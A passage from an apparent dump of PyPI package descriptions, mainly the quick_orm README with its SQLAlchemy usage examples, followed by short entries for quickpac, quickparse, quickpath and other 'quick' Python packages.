\u2026\u201d ones.simple: the core code counts only 217 lines including comments and pydocs, there is no room for bugs.free: released under BSD license, you are free to use it and distribute it.powerful: built upon SQLAlchemy and doesn\u2019t compromise its power.support relationships by means of python decorators.support table inheritance in a most natural way.support multiple databases: you can map your models to many databases without difficulty.write less, do more: taking advantage of python metaclass reduces data modeling code dramatically.long-term maintained: Continous efforts are taken to improve and maintain it.Quick Startpip install quick_ormRefer to the following examples to write your own database manipulation code.Hello World examplefrom quick_orm.core import Database\nfrom sqlalchemy import Column, String\n\n__metaclass__ = Database.DefaultMeta\n\nclass User:\n name = Column(String(30))\n\nDatabase.register()\n\nif __name__ == '__main__':\n db = Database('sqlite://') # database urls: http://docs.sqlalchemy.org/en/latest/core/engines.html#database-urls\n db.create_tables() # create tables, you don't have to write any SQL.\n\n user = User(name = 'Hello World')\n db.session.add_then_commit(user) # commit user to database.\n\n user = db.session.query(User).get(1)\n print 'My name is', user.name\n print 'created_at', user.created_at # created_at and updated_at timestamps are added automatically.\n print 'updated_at', user.updated_at\n\n user.name = 'Tyler Long'\n db.session.commit() # commit changes to database.\n print 'My name is', user.name\n print 'created_at', user.created_at\n print 'updated_at', user.updated_atMany-to-one relationship examplefrom quick_orm.core import Database\nfrom sqlalchemy import Column, String, Text\n\n__metaclass__ = Database.DefaultMeta\n\nclass Question:\n title = Column(String(70))\n content = Column(Text)\n\n@Database.many_to_one(Question)\nclass Answer:\n content = Column(Text)\n\nDatabase.register()\n\nif __name__ == '__main__':\n db = Database('sqlite://')\n db.create_tables()\n\n question = Question(title = 'What is quick_orm?', content = 'What is quick_orm?')\n answer = Answer(question = question, content = 'quick_orm is a Python ORM framework which enables you to get started in less than a minute!')\n db.session.add_then_commit(answer)\n\n question = db.session.query(Question).get(1)\n print 'The question is:', question.title\n print 'The answer is:', question.answers.first().contentMany-to-one relationship options examplefrom quick_orm.core import Database\nfrom sqlalchemy import Column, String, Text\n\n__metaclass__ = Database.DefaultMeta\n\nclass Question:\n title = Column(String(70))\n content = Column(Text)\n\n@Database.many_to_one(Question, ref_name = 'question', backref_name = 'answers')\nclass Answer:\n content = Column(Text)\n\nDatabase.register()\n\nif __name__ == '__main__':\n db = Database('sqlite://')\n db.create_tables()\n\n question = Question(title = 'What is quick_orm?', content = 'What is quick_orm?')\n answer = Answer(question = question, content = 'quick_orm is a Python ORM framework which enables you to get started in less than a minute!')\n db.session.add_then_commit(answer)\n\n question = db.session.query(Question).get(1)\n print 'The question is:', question.title\n print 'The answer is:', question.answers.first().contentMany-to-one relationship with oneself examplefrom quick_orm.core import Database\nfrom sqlalchemy import Column, String\n\n__metaclass__ = Database.DefaultMeta\n\n@Database.many_to_one('Node', ref_name = 'parent_node', backref_name = 'children_nodes')\nclass Node:\n name = Column(String(70))\n\nDatabase.register()\n\nif __name__ == '__main__':\n db = Database('sqlite://')\n db.create_tables()\n\n root_node = Node(name = 'root')\n node1 = Node(name = 'node1', parent_node = root_node)\n node2 = Node(name = 'node2', parent_node = root_node)\n db.session.add_then_commit(root_node)\n\n root_node = db.session.query(Node).filter_by(name = 'root').one()\n print 'Root node has {0} children nodes, they are {1}'\\\n .format(root_node.children_nodes.count(), ', '.join(node.name for node in root_node.children_nodes))Many-to-many relationship examplefrom quick_orm.core import Database\nfrom sqlalchemy import Column, String\n\n__metaclass__ = Database.DefaultMeta\n\nclass User:\n name = Column(String(30))\n\n@Database.many_to_many(User)\nclass Role:\n name = Column(String(30))\n\nDatabase.register()\n\nif __name__ == '__main__':\n db = Database('sqlite://')\n db.create_tables()\n\n user1 = User(name = 'Tyler Long')\n user2 = User(name = 'Peter Lau')\n role = Role(name = 'Administrator', users = [user1, user2])\n db.session.add_then_commit(role)\n\n admin_role = db.session.query(Role).filter_by(name = 'Administrator').one()\n print ', '.join([user.name for user in admin_role.users]), 'are administrators'Many-to-many relationship options examplefrom quick_orm.core import Database\nfrom sqlalchemy import Column, String\n\n__metaclass__ = Database.DefaultMeta\n\nclass User:\n name = Column(String(30))\n\n@Database.many_to_many(User, ref_name = 'users', backref_name = 'roles', middle_table_name = 'user_role')\nclass Role:\n name = Column(String(30))\n\nDatabase.register()\n\nif __name__ == '__main__':\n db = Database('sqlite://')\n db.create_tables()\n\n user1 = User(name = 'Tyler Long')\n user2 = User(name = 'Peter Lau')\n role = Role(name = 'Administrator', users = [user1, user2])\n db.session.add_then_commit(role)\n\n admin_role = db.session.query(Role).filter_by(name = 'Administrator').one()\n print ', '.join([user.name for user in admin_role.users]), 'are administrators'Many-to-many relationship with oneself examplefrom quick_orm.core import Database\nfrom sqlalchemy import Column, String\n\n__metaclass__ = Database.DefaultMeta\n\n@Database.many_to_many('User', ref_name = 'users_i_follow', backref_name = 'users_follow_me')\nclass User:\n name = Column(String(30))\n\nDatabase.register()\n\nif __name__ == '__main__':\n db = Database('sqlite://')\n db.create_tables()\n\n peter = User(name = 'Peter Lau')\n mark = User(name = 'Mark Wong', users_i_follow = [peter, ])\n tyler = User(name = 'Tyler Long', users_i_follow = [peter, ], users_follow_me = [mark, ])\n db.session.add_then_commit(tyler)\n\n tyler = db.session.query(User).filter_by(name = 'Tyler Long').one()\n print 'Tyler Long is following:', ', '.join(user.name for user in tyler.users_i_follow)\n print 'People who are following Tyler Long:', ', '.join(user.name for user in tyler.users_follow_me)\n mark = db.session.query(User).filter_by(name = 'Mark Wong').one()\n print 'Mark Wong is following:', ', '.join(user.name for user in mark.users_i_follow)One-to-one relationship examplefrom quick_orm.core import Database\nfrom sqlalchemy import Column, String\n\n__metaclass__ = Database.DefaultMeta\n\nclass User:\n name = Column(String(30))\n\n@Database.one_to_one(User)\nclass Contact:\n email = Column(String(70))\n address = Column(String(70))\n\nDatabase.register()\n\nif __name__ == '__main__':\n db = Database('sqlite://')\n db.create_tables()\n\n contact = Contact(email = 'quick.orm.feedback@gmail.com', address = 'Shenzhen, China')\n user = User(name = 'Tyler Long', contact = contact)\n db.session.add_then_commit(user)\n\n user = db.session.query(User).get(1)\n print 'User:', user.name\n print 'Email:', user.contact.email\n print 'Address:', user.contact.addressMultiple many-to-one relationships examplefrom quick_orm.core import Database\nfrom sqlalchemy import Column, String, Text\n\n__metaclass__ = Database.DefaultMeta\n\nclass User:\n name = Column(String(30))\n\n@Database.many_to_one(User, ref_name = 'author', backref_name = 'articles_authored')\n@Database.many_to_one(User, ref_name = 'editor', backref_name = 'articles_edited')\nclass Article:\n title = Column(String(80))\n content = Column(Text)\n\nDatabase.register()\n\nif __name__ == '__main__':\n db = Database('sqlite://')\n db.create_tables()\n\n author = User(name = 'Tyler Long')\n editor = User(name = 'Peter Lau')\n article = Article(author = author, editor = editor, title = 'quick_orm is super quick and easy',\n content = 'quick_orm is super quick and easy. Believe it or not.')\n db.session.add_then_commit(article)\n\n article = db.session.query(Article).get(1)\n print 'Article:', article.title\n print 'Author:', article.author.name\n print 'Editor:', article.editor.namePerforming raw sql query examplefrom quick_orm.core import Database\nfrom sqlalchemy import Column, String\n\n__metaclass__ = Database.DefaultMeta\n\nclass User:\n name = Column(String(70))\n\nDatabase.register()\n\nif __name__ == '__main__':\n db = Database('sqlite://')\n db.create_tables()\n\n count = db.engine.execute('select count(name) from user').scalar()\n print 'There are {0} users in total'.format(count)Multiple databases examplefrom quick_orm.core import Database\nfrom sqlalchemy import Column, String\n\n__metaclass__ = Database.DefaultMeta\n\nclass User:\n name = Column(String(30))\n\nDatabase.register()\n\nif __name__ == '__main__':\n db1 = Database('sqlite://')\n db1.create_tables()\n\n db2 = Database('sqlite://')\n db2.create_tables()\n\n user1 = User(name = 'user in db1')\n user2 = User(name = 'user in db2')\n db1.session.add_then_commit(user1)\n db2.session.add_then_commit(user2)\n\n print 'I am', db1.session.query(User).get(1).name\n print 'I am', db2.session.query(User).get(1).nameTable inheritance examplefrom quick_orm.core import Database\nfrom sqlalchemy import Column, String, Text\n\n__metaclass__ = Database.DefaultMeta\n\nclass User:\n name = Column(String(70))\n\n@Database.many_to_one(User)\nclass Post:\n content = Column(Text)\n\nclass Question(Post):\n title = Column(String(70))\n\n@Database.many_to_one(Question)\nclass Answer(Post):\n pass\n\n@Database.many_to_one(Post)\nclass Comment(Post):\n pass\n\n@Database.many_to_many(Post)\nclass Tag:\n name = Column(String(70))\n\nDatabase.register()\n\nif __name__ == '__main__':\n db = Database('sqlite://')\n db.create_tables()\n\n user1 = User(name = 'Tyler Long')\n user2 = User(name = 'Peter Lau')\n\n tag1 = Tag(name = 'quick_orm')\n tag2 = Tag(name = 'nice')\n\n question = Question(user = user1, title = 'What is quick_orm?', content = 'What is quick_orm?', tags = [tag1, ])\n question2 = Question(user = user1, title = 'Have you tried quick_orm?', content = 'Have you tried quick_orm?', tags = [tag1, ])\n\n answer = Answer(user = user1, question = question, tags = [tag1, ],\n content = 'quick_orm is a Python ORM framework which enables you to get started in less than a minute!')\n\n comment1 = Comment(user = user2, content = 'good question', post = question)\n comment2 = Comment(user = user2, content = 'nice answer', post = answer, tags = [tag2, ])\n\n db.session.add_all_then_commit([question, question2, answer, comment1, comment2, tag1, tag2, ])\n\n question = db.session.query(Question).get(1)\n print 'tags for question \"{0}\": \"{1}\"'.format(question.title, ', '.join(tag.name for tag in question.tags))\n print 'new comment for question:', question.comments.first().content\n print 'new comment for answer:', question.answers.first().comments.first().content\n\n user = db.session.query(User).filter_by(name = 'Peter Lau').one()\n print 'Peter Lau has posted {0} comments'.format(user.comments.count())\n\n tag = db.session.query(Tag).filter_by(name = 'quick_orm').first()\n print '{0} questions are tagged \"quick_orm\"'.format(tag.questions.count())MetaBuilder to avoid duplicate code examplefrom quick_orm.core import Database\nfrom sqlalchemy import Column, String\n\nclass DefaultModel:\n name = Column(String(70))\n\n__metaclass__ = Database.MetaBuilder(DefaultModel)\n\nclass User:\n pass\n\nclass Group:\n pass\n\nDatabase.register()\n\nif __name__ == '__main__':\n db = Database('sqlite://')\n db.create_tables()\n user = User(name = 'tylerlong')\n db.session.add(user)\n group = Group(name = 'python')\n db.session.add_then_commit(group)\n\n print user.name\n print group.nameModel for stackoverflow.com examplefrom quick_orm.core import Database\nfrom sqlalchemy import Column, String, Text\n\n__metaclass__ = Database.DefaultMeta\n\n@Database.many_to_many('User', ref_name = 'followed_users', backref_name = 'followers')\nclass User:\n email = Column(String(200))\n name = Column(String(100))\n\n@Database.many_to_one(User)\nclass Post:\n content = Column(Text)\n\n@Database.many_to_one(Post)\nclass Comment(Post):\n pass\n\nclass Question(Post):\n title = Column(String(200))\n\n@Database.many_to_one(Question)\nclass Answer(Post):\n pass\n\n@Database.many_to_many(Post)\nclass Tag:\n name = Column(String(50))\n\n@Database.many_to_one(User, ref_name = 'sender', backref_name = 'messages_sent')\n@Database.many_to_one(User, ref_name = 'receiver', backref_name = 'messages_received')\nclass Message:\n content = Column(Text)\n\n@Database.many_to_one(User)\n@Database.many_to_one(Post)\nclass Vote:\n type = Column(String(20)) #\"vote_up\" or \"vote_down\"\n\nDatabase.register()\n\nif __name__ == '__main__':\n db = Database('sqlite://')\n db.create_tables()\n\n user1 = User(email = 'tylerlong@example.com', name = 'Tyler Long')\n user2 = User(email = 'peterlau@example.com', name = 'Peter Lau')\n\n tag1 = Tag(name = 'Python')\n tag2 = Tag(name = 'quick_orm')\n\n question1 = Question(user = user1, title = 'Can you program in Python?', content = 'RT')\n question2 = Question(user = user1, title = 'Do you know quick_orm?', content = 'RT')\n\n answer1 = Answer(user = user2, question = question1, content = 'Yes I can')\n answer2 = Answer(user = user2, question = question2, content = 'No I don\\'t')\n\n comment1 = Comment(user = user1, content = 'You rock')\n comment2 = Comment(user = user1, content = 'You suck')\n\n answer1.comments = [comment1,]\n answer2.comments = [comment2,]\n\n user1.followers = [user2,]\n question1.tags = [tag1,]\n answer2.tags = [tag2,]\n\n vote1 = Vote(user = user1, type = 'vote_up', post = question1)\n vote2 = Vote(user = user2, type = 'vote_up', post = question1)\n vote2 = Vote(user = user2, type = 'vote_down', post = question2)\n\n db.session.add_all_then_commit([user1, user2,])\n\n print user2.name, 'is following', ', '.join(user.name for user in user2.followed_users)\n print user1.name, 'questions:', ', '.join(question.title for question in user1.questions)\n print 'question1 tags:', ', '.join(tag.name for tag in question1.tags)\n print 'answer2 comments:', ', '.join(comment.content for comment in answer2.comments)\n print 'answer \"', answer1.content, '\" is for question: \"', answer1.question.title, '\"'\n print 'there are {0} vote_ups for question \"{1}\"'.format(question1.votes.filter_by(type = 'vote_up').count(), question1.title)Examples from real lifeEverblogis a personal blogging platform taking advantage of evernote, it chooses quick_orm as its ORM framework. Refer toeverblog\u2019s database model filefor more detail.If you know any other successful stories about quick_orm, do tell me and I will list them above.Where to learn more about quick_orm?As said above, quick_orm is built upon SQLAlchemy. quick_orm never tries to hide SQLAlchemy\u2019s flexibility and power. Everything availiable in SQLAlchemy is still available in quick_orm.So please read the documents of SQLAlchemy, you would learn much more there than you could here.Read quick_orm\u2019s source code, try to improve it.You wanna involve?quick_orm is released under BSD lisence.The source code is hosted on github:https://github.com/tylerlong/quick_ormAcknowledgementsquick_orm is built upon SQLAlchemy - the famous Python SQL Toolkit and Object Relational Mapper. All of the glory belongs to the SQLAlchemy development team and the SQLAlchemy community! My contribution to quick_orm becomes trivial compared with theirs( to SQLAlchemy).FeedbackComments, suggestions, questions, free beer, t-shirts, kindles, ipads \u2026 are all welcome!Email:quick.orm.feedback@gmail.comtodo listfull text search. (class decorator for model?)orm for nosql? such as this one:http://qslack.com/projects/rhino-a-ruby-hbase-orm/ref_grandchildren can\u2019t access some attributes of grandchildren. for example: everblog project: tag.blog_entrys.lang report an error.generate visual charts according to model. It is good for analyzing and demonstrating.multiple many_to_many between two modelsmake table name customizable"} +{"package": "quickpac", "pacakge-description": "QuickpacHere you will find all public interfaces to the Quickpac system.This Python package is automatically generated by theSwagger Codegenproject:API version: v1.00Package version: 1.0.0Build package: io.swagger.codegen.v3.generators.python.PythonClientCodegenRequirements.Python 3.4+Installation & Usagepip installpipinstallquickpacOr you can install directly from Github:pipinstallgit+https://github.com/camptocamp/quickpac-client.gitSwagger client generationGenerate viaSwagger codegen.Getting StartedPlease follow theinstallation procedureand then run the following:importquickpacfromquickpac.restimportApiExceptionfrompprintimportpprint# Configure HTTP basic authorization: Basicconfiguration=quickpac.Configuration()configuration.username='YOUR_USERNAME'configuration.password='YOUR_PASSWORD'# create an instance of the API classapi_instance=quickpac.BarcodeApi(quickpac.ApiClient(configuration))body=quickpac.GenerateLabelRequest()# GenerateLabelRequest | (optional)try:# Generates an address labelapi_response=api_instance.barcode_generate_label_post(body=body)pprint(api_response)exceptApiExceptionase:print(\"Exception when calling BarcodeApi->barcode_generate_label_post:%s\\n\"%e)Documentation for API EndpointsAll URIs are relative tohttps://api.quickpac.chClassMethodHTTP requestDescriptionBarcodeApibarcode_generate_label_postPOST/Barcode/GenerateLabelGenerates an address labelPickupMigrosApipickmup_set_paket_status_getGET/Pickmup/SetPaketStatusSetPaketStatusPickupMigrosApipickmup_set_paket_status_postPOST/Pickmup/SetPaketStatusSetPaketStatusPickupMigrosApipickmup_set_ruecksendung_getGET/Pickmup/SetRuecksendungSetRuecksendungPickupMigrosApipickmup_set_ruecksendung_postPOST/Pickmup/SetRuecksendungSetRuecksendungZIPApiz_ip_get_all_zip_codes_getGET/ZIP/GetAllZipCodesReturns all currently deliverable and planned postcodes.ZIPApiz_ip_is_deliverable_zip_code_getGET/ZIP/IsDeliverableZipCodeChecks whether the requested postcode can currently be delivered.Documentation For ModelsCommunicationDimensionsGenerateLabelCustomerGenerateLabelDefinitionGenerateLabelEnvelopeGenerateLabelFileInfosGenerateLabelRequestGenerateLabelResponseGenerateLabelResponseDefinitionGenerateLabelResponseEnvelopeGenerateLabelResponseEnvelopeDataGenerateLabelResponseEnvelopeDataProviderGenerateLabelResponseEnvelopeDataProviderSendingItemItemChoiceTypeLabelDataLabelDataProviderLabelDataProviderSendingLabelResponseItemLanguageLanguageCodeLogoAspectRatioLogoHorizontalAlignLogoVerticalAlignMessageTypeModeTypeNotificationNotificationTypePickupMigrosCallbackResultResponsePickupMigrosSetPaketStatusRequestPickupMigrosSetRuecksendungPrintAddressesTypeRecipientServiceCodeAttributesZIPAllResponseZIPIsCurrentResponseZIPModelDocumentation For AuthorizationBasicType: HTTP basic authenticationAuthor"} +{"package": "quickpack", "pacakge-description": "you can use this in the command line,the tool will pack all py files under the path you enter,this is a example:pack -p pathyou can also remove all exe under the path before packing:pack -r -p pathuse pack -h to get more information"} +{"package": "quickpackage", "pacakge-description": "UNKNOWN"} +{"package": "quickpanda", "pacakge-description": "a pipeline for quick data analysis and machine learningfile_operate:read file and do base operate like auto asdtype etc.it support multi type files operates together.preprocess:create a preprocessor to preprocessing(dropna,fillna,dropoutlyers...)\nyou can select the file and cols by passing dict-type args.analysis:base on the previous manipulations,we get clean datas,we can now acutally start the analysis tasks:\ncorrelation:\n get correlations between value-type features and labels. \n compare the correlation between class-type features and labels.modeling:we provide base ml models to complete classification or regression tasks\nlisting:\n gbdt:xgboost,light gbm,radom forests\n norm:svc,linear,logistic,bayes\n timesequence:ARMA,ARIMA\n nn:\n DeepLearning:\\statistic_test:normality test\ncorrelation test\nsignificance test\nparametric test\nnonparametric test"} +{"package": "quickpanda-aidroid", "pacakge-description": "#a pipeline for quick data analysis and machine learning##file_operate:123read file and do base operate like auto asdtype etc.it support multi type files operates together.##preprocess:create a preprocessor to preprocessing(dropna,fillna,dropoutlyers...)\nyou can select the file and cols by passing dict-type args.##analysis:\nbase on the previous manipulations,we get clean datas,we can now acutally start the analysis tasks:\ncorrelation:\nget correlations between value-type features and labels.\ncompare the correlation between class-type features and labels.##modeling:\nwe provide base ml models to complete classification or regression tasks\nlisting:\ngbdt:xgboost,light gbm,radom forests\nnorm:svc,linear,logistic,bayes\ntimesequence:ARMA,ARIMA\nnn:\nDeepLearning:\\statistic_test:normality test\ncorrelation test\nsignificance test\nparametric test\nnonparametric test\u8868\u5934\u8868\u5934\u5355\u5143\u683c\u5355\u5143\u683c\u5355\u5143\u683c\u5355\u5143\u683c"} +{"package": "quick-pandas", "pacakge-description": "quick-pandasMakepandasrun faster with a single monkey_patch call.Installpipinstallquick-pandas--upgradeUsageimportpandasaspdfromquick_pandasimportmonkeymonkey.patch_all()df=pd.DataFrame(data=[1])df.sort_values(kind='radixsort',by=0)NoticeThis library is still under development and is unstable. DoNOTuse it unless you know what you are doing."} +{"package": "quickparse", "pacakge-description": "QuickParseSimple command line argument parser for PythonExamplelist_things.py:fromquickparseimportQuickParsedeflist_things(a_list,quickparse):ifquickparse.numeric:ifisinstance(quickparse.numeric,tuple):print(', '.join(map(str,a_list[:quickparse.numeric[-1]])))else:print(', '.join(map(str,a_list[:quickparse.numeric])))else:print(\"How many items? Give a numeric value like '-3'\")commands_config={'ls':list_things,'':lambda:print(\"Command is missing, use 'ls'\"),}things=['apple','banana','blueberry','orange','pear','pineapple']QuickParse(commands_config).execute(things)Run it:$pythonlist_things.pyls-5\napple,banana,blueberry,orange,pearThe way it works:commands_configtells QuickParse to look forlsas a command and calllist_thingson it - when no commands show helpQuickParse parses arguments as normal whilelsis privileged as a commandQuickParse finds-5so it adds asquickparse.numeric = 5(quickparsebeing theQuickParseinstance that otherwise would come asquickparse = QuickParse(commands_config))QuickParse seeslist_thingsbeing associated tols, soquickparse.execute(things)calls it, passing on the arguments ofexecute(..)- one positional argument in this casesincelist_thingsexpects a named argumentquickparse, QuickParse makes sure it passes on the reference to its own instance ofquickparseif there are multiple numeric flags are given all are passed down withquickparse.numericin a tupleGNU Argument Syntax implementation with extensionsGNU Argument Syntax:https://www.gnu.org/software/libc/manual/html_node/Argument-Syntax.htmlExtensionsNumeric '-' values$my_cmd-12Numeric '+' values$my_cmd+12Long '-' options - only with explicit config$my_cmd-listBy default it becomes-l -i -s -t, but addingQuickParse(options_config = [ ('-list', ) ])will stop unpacking.Long '+' options by default$my_cmd+listEquivalent options - using options_config$my_cmd-lis equivalent to$my_cmd--listif addingQuickParse(options_config = [ ('-l', '--list') ])Command-subcommand hierarchy and function bindings - using commands_configDefining a random sample fromgitlooks like this:commands_config={'':do_show_help,'commit':do_commit,'log':do_log,'stash':{'':do_stash,'list':do_stash_list,}}options_config=[('-a','--all'),]QuickParse(commands_config,options_config).execute()Commands are called according to commands_config.That is$ git log -3callsdo_logdo_logmay look like this:defdo_log(quickparse):print(get_log_entries()[:quickparse.numeric])If there is a named argument indo_log's signature calledquickparse, the instance coming fromQuickParse(commands_config, options_config)is passed down holding all the results of parsing.Parsing happens by using the defaults and applying whatoptions_configadds to it.Argument FormatsArgument\u00a0FormatExampleRemarks-$ my_cmd -12(default)+$ my_cmd +12(default)-$ my_cmd -x(default)+$ my_cmd +x(default)-$ my_cmd -nFoounpacking is the default: -n -F -ooptions_configneeds a type entry saying it expects a value (other than bool)+$ my_cmd +nFoounpacking is the default: +n +F +ooptions_configneeds a type entry saying it expects a value (other than bool)-=$ my_cmd -n=Foo(default)+=$ my_cmd +n=Foo(default)- $ my_cmd -n Foooptions_configneeds a type entry saying it expects a value (other than bool)+ $ my_cmd +n Foooptions_configneeds a type entry saying it expects a value (other than bool)-$ my_cmd -abcunpacking is the default: -a -b -cif inoptions_configit's taken as-abc+$ my_cmd +abcunpacking is the default: +a +b +cif inoptions_configit's taken as+abc-=$ my_cmd -name=Foo(default)+=$ my_cmd +name=Foo(default)--$ my_cmd --list(default)--=$ my_cmd --message=Bar(default)-- $ my_cmd --message Baroptions_configneeds a type entry saying it expects a value (other than bool)--$ my_cmd -- --param-anywayparameters delimiter(default)means [a-zA-Z] and '-'s not in the first placeAn argument like '-a*' gets unpacked if...'-a' is not defined to expect a valuethe '*' part has only letters, not '-' or '='How to change the interpretation of-swingIt can mean (default):-s -w -i -n -gor-s wing/-s=wingTo acheve the latter make the parser aware that '-s' expects astrvalue:options_config=[('-s',str),]Make the parser aware that an option expects a value after a spaceAdd type explicitly inoptions_config.For just getting as it is addstr.How to define option typesUse build-in types likeintorfloat, or create a callable that raises exceptions.Usingboolis a special case: parser will not expect a value but explicitly adds an error if one provided.How to add empty value to an option--option=Some commands support '-' as empty value likecurl -C - -O http://domanin.com/To avoid ambiguities this syntax is not supported.Use--option=instead.How to define optionsoptions_test.py:fromquickparseimportQuickParseoptions_config=[('-u','--utc','--universal'),('-l','--long'),('-n','--name',str),]quickparse=QuickParse(options_config=options_config)print(f'quickparse.options:{quickparse.options}')print(f'quickparse.errors:{quickparse.errors}')Run it:$pythonoptions_test.py\nquickparse.options:{}quickparse.errors:{}$pythonoptions_test.py-u\nquickparse.options:{'-u':True,'--utc':True,'--universal':True}quickparse.errors:{}$pythonoptions_test.py-ul\nquickparse.options:{'-u':True,'--utc':True,'--universal':True,'-l':True,'--long':True}quickparse.errors:{}$pythonoptions_test.py-uln\nquickparse.options:{'-u':True,'--utc':True,'--universal':True,'-l':True,'--long':True,'-n':True,'--name':True}quickparse.errors:{'-n':{'type':1,'message':\"No value got for '-n/--name' - validator: str\"},'--name':{'type':1,'message':\"No value got for '-n/--name' - validator: str\"}}$pythonoptions_test.py-ul-nthe_name\nquickparse.options:{'-u':True,'--utc':True,'--universal':True,'-l':True,'--long':True,'-n':'the_name','--name':'the_name'}quickparse.errors:{}$pythonoptions_test.py-ul-nthe_name\nquickparse.options:{'-u':True,'--utc':True,'--universal':True,'-l':True,'--long':True,'-n':'the_name','--name':'the_name'}quickparse.errors:{}$pythonoptions_test.py-ul-n=the_name\nquickparse.options:{'-u':True,'--utc':True,'--universal':True,'-l':True,'--long':True,'-n':'the_name','--name':'the_name'}quickparse.errors:{}$pythonoptions_test.py-ul--namethe_name\nquickparse.options:{'-u':True,'--utc':True,'--universal':True,'-l':True,'--long':True,'--name':'the_name','-n':'the_name'}quickparse.errors:{}$pythonoptions_test.py-ul--name=the_name\nquickparse.options:{'-u':True,'--utc':True,'--universal':True,'-l':True,'--long':True,'--name':'the_name','-n':'the_name'}quickparse.errors:{}Test your command line argumentsquickparse_test_args.py(committed in the repo):frompprintimportpformatfromquickparseimportQuickParsedefdo_show_help():print(\"Executing 'do_show_help'...\")defdo_commit():print(\"Executing 'do_commit'...\")defdo_log(quickparse):print(\"Executing 'do_log'...\")defdo_stash():print(\"Executing 'do_stash'...\")defdo_stash_list():print(\"Executing 'do_stash_list'...\")commands_config={'':do_show_help,'commit':do_commit,'log':do_log,'stash':{'':do_stash,'list':do_stash_list,}}options_config=[('-m','--message',str),('-p','--patch'),]quickparse=QuickParse(commands_config,options_config)print(f'Commands:\\n{pformat(quickparse.commands)}')print(f'Parameters:\\n{pformat(quickparse.parameters)}')print(f'Options:\\n{pformat(quickparse.options)}')print(f'\\'-\\'numeric argument:\\n{pformat(quickparse.numeric)}')print(f'\\'+\\'numeric argument:\\n{pformat(quickparse.plusnumeric)}')print(f'Functions to call:\\n{pformat(quickparse.to_execute)}')quickparse.execute()Error handlingIf the parser parameters 'commands_config' or 'options_config' are not valid, ValueError is rased from the underlying AssertionError.If the arguments are not compliant with the config (e.g. no value provided for an option that requires one) then no exceptions are raised but anerrorslist is populated on theQuickParseobject.See the error object again fromoptions_test.py$pythonoptions_test.py-uln\nquickparse.options:{'-u':True,'--utc':True,'--universal':True,'-l':True,'--long':True,'-n':True,'--name':True}quickparse.errors:{'-n':{'type':1,'message':\"No value got for '-n/--name' - validator: str\"},'--name':{'type':1,'message':\"No value got for '-n/--name' - validator: str\"}}quickparse.errorsdict is about validation of options. These are the types:ERROR_TYPE_VALIDATION=0ERROR_VALUE_NOT_FOUND=1ERROR_INCOMPLETE_COMMAND=2quickparse.has_errors is also available to check if any errors occurred.ValidationWell, I still need to elaborate the docs on this but here is a quick example snippet.quickparse.validate({'parameters':{'mincount':1,},'options':{'mandatory':'--branch','optional':'--stage',},'numeric':{'maxcount':0},'plusnumeric':{'maxcount':0},})assert'parameters.mincount'notinquickparse.errors,f'Add a target'assertnotquickparse.has_errors,'\\n'.join(quickparse.error_messages)"} +{"package": "quick-passwd-gener", "pacakge-description": "This package has a method that generates and returns a random password with the user specified input length for the password to be generated."} +{"package": "quick-password", "pacakge-description": "it's so easy to use"} +{"package": "quickpath", "pacakge-description": "QuickPathQuickPath is a package, which provides functions for easy access the elements of collection/object structures.Motivating exampleanimals=[{'name':'Wombat','avg_properties':{'height':{'value':66,'unit':'cm'},'length':{'value':108,'unit':'cm'},'weight':{'value':27,'unit':'kg'}}},{'name':'Duck','avg_properties':{'height':{'value':62,'unit':'cm'},'weight':{'value':1,'unit':'kg'}}},{'name':'Dog','max_properties':{'height':{'value':95,'unit':'cm'},'weight':{'value':105,'unit':'kg'}}},]Let's query that above structure:foranimalinanimals:print(animal[\"name\"],'average length',animal[\"avg_properties\"][\"length\"][\"value\"])This code will abort with error as no theDuckhas nolengthkey. We have to add one more check.foranimalinanimals:print(animal[\"name\"],'average length',animal[\"avg_properties\"][\"length\"][\"value\"]if\"length\"inanimal[\"avg_properties\"]else'-')This improved code will still fail asDoghas onlymax_propertykey, we have to handle this situation too.foranimalinanimals:if\"avg_properties\"inanimaland\"length\"inanimal[\"avg_properties\"]:print(animal[\"name\"],'average length',animal[\"avg_properties\"][\"length\"][\"value\"])else:print(animal[\"name\"],'avarage length',\"-\")The above scenarios can be simplified byquickpath:fromquickimportimportgetpathforanimalinanimals:print(animal[\"name\"],'average length',getpath(animal,(\"avg_properties\",\"length\",\"value\"),default='-'))Alternatively, the keys can be represented as a single string:fromquickimportimportgetpathsforanimalinanimals:print(animal[\"name\"],'average length',getpaths(animal,\"avg_properties.length.value\"),default='-'))Separator can be changed to any alternative characters:fromquickimportimportgetpathsforanimalinanimals:print(animal[\"name\"],'average length',getpaths(animal,\"avg_properties/length/value\"),default='-',sep='/')"} +{"package": "quickpath-airflow-operator", "pacakge-description": "Quickpath Airflow OperatorAllows from Execution of Blueprints on the Quickpath Platform from within AirflowInstallationpip install quickpath-airflow-operatorConnectionsConnections can be created asHTTPTypeService Connection (QPP-Group)Service Connection is Required for Blueprint ExecutionConnection ID = `QPP-Group`\nConnection Type = `HTTP`\nSchema = `https`\nHost = ``\nPassword = ``API Connection (QPP-User)API Connection is only required ifpoll_for_results=TrueConnection ID = `QPP-User`\nConnection Type = `HTTP`\nSchema = `https`\nHost = ``\nPassword = ``UsageImportfrom quickpath_airflow_operator import QuickpathPlatformOperator`Syncronous Execution will execute a blueprint, wait for the result, and return itquickpath_execution = QuickpathPlatformOperator(\n task_id=\"run_blueprint\",\n service_connection_id=\"QPP-Group\",\n api_connection_id=\"QPP-User\",\n environment_name=\"design\",\n blueprint_endpoint=\"blueprint_endpoint\",\n request_object={},\n synchronous=True,\n)Produces XCom Keysblueprint_uuidandblueprint_responseAsyncronous Execution With Result Polling will execute a blueprint and poll for the blueprint resultsAsyncronous Execution will execute a blueprint and return the Blueprint UUIDquickpath_execution = QuickpathPlatformOperator(\n task_id=\"run_blueprint\",\n service_connection_id=\"QPP-Group\",\n api_connection_id=\"QPP-User\",\n environment_name=\"design\",\n blueprint_endpoint=\"blueprint_endpoint\",\n request_object={},\n synchronous=False,\n poll_for_results=True,\n max_polls=20,\n poll_interval=5\n)Produces XCom Keysblueprint_uuidAsyncronous Execution will execute a blueprint and return the Blueprint UUIDquickpath_execution = QuickpathPlatformOperator(\n task_id=\"run_blueprint\",\n service_connection_id=\"QPP-Group\",\n api_connection_id=\"QPP-User\",\n environment_name=\"design\",\n blueprint_endpoint=\"blueprint_endpoint\",\n request_object={},\n synchronous=False,\n poll_for_results=True,\n)Produces XCom Keysblueprint_uuidandblueprint_response"} +{"package": "quickpathstr", "pacakge-description": "QuickPathStrCopyright (c) 2023 Sean Yeatts. All rights reserved.This module provides syntax for working with strings in the context of file\nmanagement. It's designed to reinforce a universal 